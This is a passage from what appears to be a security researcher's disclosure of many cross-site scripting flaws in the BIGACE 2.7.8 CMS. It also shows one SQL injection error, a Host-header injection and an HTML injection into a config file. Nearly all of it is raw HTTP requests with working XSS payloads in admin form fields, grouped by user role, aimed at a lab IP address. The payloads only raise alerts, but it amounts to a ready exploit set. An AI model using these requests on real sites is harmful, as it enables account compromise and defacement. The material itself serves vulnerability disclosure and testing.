POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500
-----------------------------60191211818685
Content-Disposition: form-data; name="mode"
upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"
"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------60191211818685--
---< request >---
15. xss + information disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode="%20body%20onload%3d"alert(4321)"%3e
---< request >---
Response:
<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>. All rights reserved. <br />© 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---
III. For 'designer' user logged-in:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214
designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---
IV. For admin logged-in:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
Response:
<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022
-----------------------------309932421512500
Content-Disposition: form-data; name="mode"
upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"
a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------309932421512500--
---< request >---
3. same request, parameter data[name] (xss too)
4. same for parameter: data[unique_name], data[description].
for data[description] to reproduce you must exit from <textarea> tag, so
payload should be similar to this one:
</textarea><script>alert(2)</script>
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420
-----------------------------47528326907
Content-Disposition: form-data; name="mode"
upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"
"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------47528326907--
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52
data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
21. SQL Injection
<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
;]
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---
23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---
24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---
25. xss + info disclo
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---
26. adding new community
when you're adding new community you can write
directly to file consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]
In this case, I changed 'aaaa' string to html code to check if page
will show it (as html, not as txt). HTML injection is possible here.
27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---
31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
Cheers o/
I decide to check it again, and I found few other things described below.
I. For normal registered ('anonymous') user:
1. Escaping from the source code via Host header:
---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---
Response:
<link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaa
aaaaa%3c%68%3 1%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text
II. For editor user logged-in:
1. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
